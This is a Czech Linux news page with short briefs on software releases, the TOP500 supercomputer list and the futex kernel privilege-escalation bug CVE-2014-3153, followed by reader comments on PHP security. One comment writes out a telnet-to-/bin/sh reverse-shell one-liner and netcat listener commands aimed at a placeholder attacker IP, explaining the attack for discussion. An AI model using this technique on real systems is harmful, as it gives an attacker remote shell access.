Deno (Wikipedie), běhové prostředí (runtime) pro JavaScript, TypeScript a WebAssembly, bylo vydáno v nové verzi 2.9. Hlavní novinkou je deno desktop pro převod Deno projektu na desktopovou aplikaci. Jedná se o alternativu k frameworkům Electron nebo Tauri.
Od zítra jsou Datové schránky oficiálně na nové adrese datovka.gov.cz. Adresa mojedatovaschranka.cz zůstává funkční do 27. srpna 2026, následně budou uživatelé automaticky přesměrováni na datovka.gov.cz.
Dolphin (Wikipedie), tj. open source multiplatformní emulátor herních konzolí GameCube a Wii od Nintenda, byl vydán ve verzi 2606. S podporou Game Boy Playeru.
Vasudeva Kamath představil utilitu debvulns, alternativu k nativní utilitě debsecan, pro výpis zranitelností v Debianu. Navíc má především možnost výstupu ve strukturovaných formátech JSON a CSV. V plánu je exportér pro Prometheus.
Oficiální český státní eshop s elektronickými dálničními známkami nově najdete na edalnice.gov.cz. Doména gov.cz jasně potvrzuje, že jste na oficiálním státním webu [𝕏].
Byla vydána nová verze 4.8.0 interaktivního shellu fish (friendly interactive shell, Wikipedie). Přehled novinek v poznámkách k vydání.
Byl aktualizován seznam 500 nejvýkonnějších superpočítačů na světě TOP500. Nejvýkonnějším superpočítačem se nově stal čínský LineShine v Národním superpočítačovém centru v Šen-čenu (NSCS) s výkonem 2,198 exaFLOPS. Z prvního místa sesadil americký superpočítač El Capitan s výkonem 1,809 exaFLOPS. Nejvýkonnější český počítač C24 klesl na 215 místo. Karolina, GPU partition klesla na 249. místo a Karolina, CPU partition na 475. místo.
… více »Zemřel průkopník videoherní hudby Bobby Prince (Wikipedie). Složil hudbu pro hry Wolfenstein 3D, Doom, Doom II, Duke Nukem II a Duke Nukem 3D.
Počítačová hra Operace Flashpoint (Arma: Cold War Assault) od společnosti Bohemia Interactive slaví 25 let. Při této příležitosti bylo publikováno bezplatné hratelné Arma: Cold War Assault Remastered Demo a na GitHubu byly zveřejněny zdrojové kódy.
Na trh v České republice přichází HP EliteBoard G1a. Jde o plnohodnotný AI počítač integrovaný přímo do těla klávesnice, tedy zařízení, které na první pohled vypadá jako minimalistická klávesnice, ale ve skutečnosti nahrazuje klasickou počítačovou jednotku.
Na mailing listu oss-sec bylo upozorněno na chybu v implementaci futexu v jádře (CVE-2014-3153). Lze ji zneužít k eskalaci práv. Ve stable Debianu je již opravena.
Tiskni
Sdílej:
/bin/telnet IP 80 | /bin/sh | /bin/telnet IP 25vyrobí "reverse channel" z napadeného systému na IP útočníka. Pokud u něj čekají dvě instance
netcat na dva telnetové kanály
nc –l –n –v –p 80 (25)tak má útočník shell. Pak přes jeden netcat pošle příkaz, ten prohučí přes shell a zobrazí se do druhého netcatu. Porty 80 a 25 jsou zvoleny proto, že je většina firewallů povoluje. Nebo to může být 80 a 443.
Proto minimum by měl být alespoň safe_mode... tak to snad ne, že ne? Z dokumentace PHP: "This feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0." Krom toho například v Debianu ohledně opravování chyb v PHP píší: "PHP security issues are typically triaged with different priorities based on the particulars of the issue. Issues involving features that are broken as designed (safe mode, register globals, etc) are completely ignored."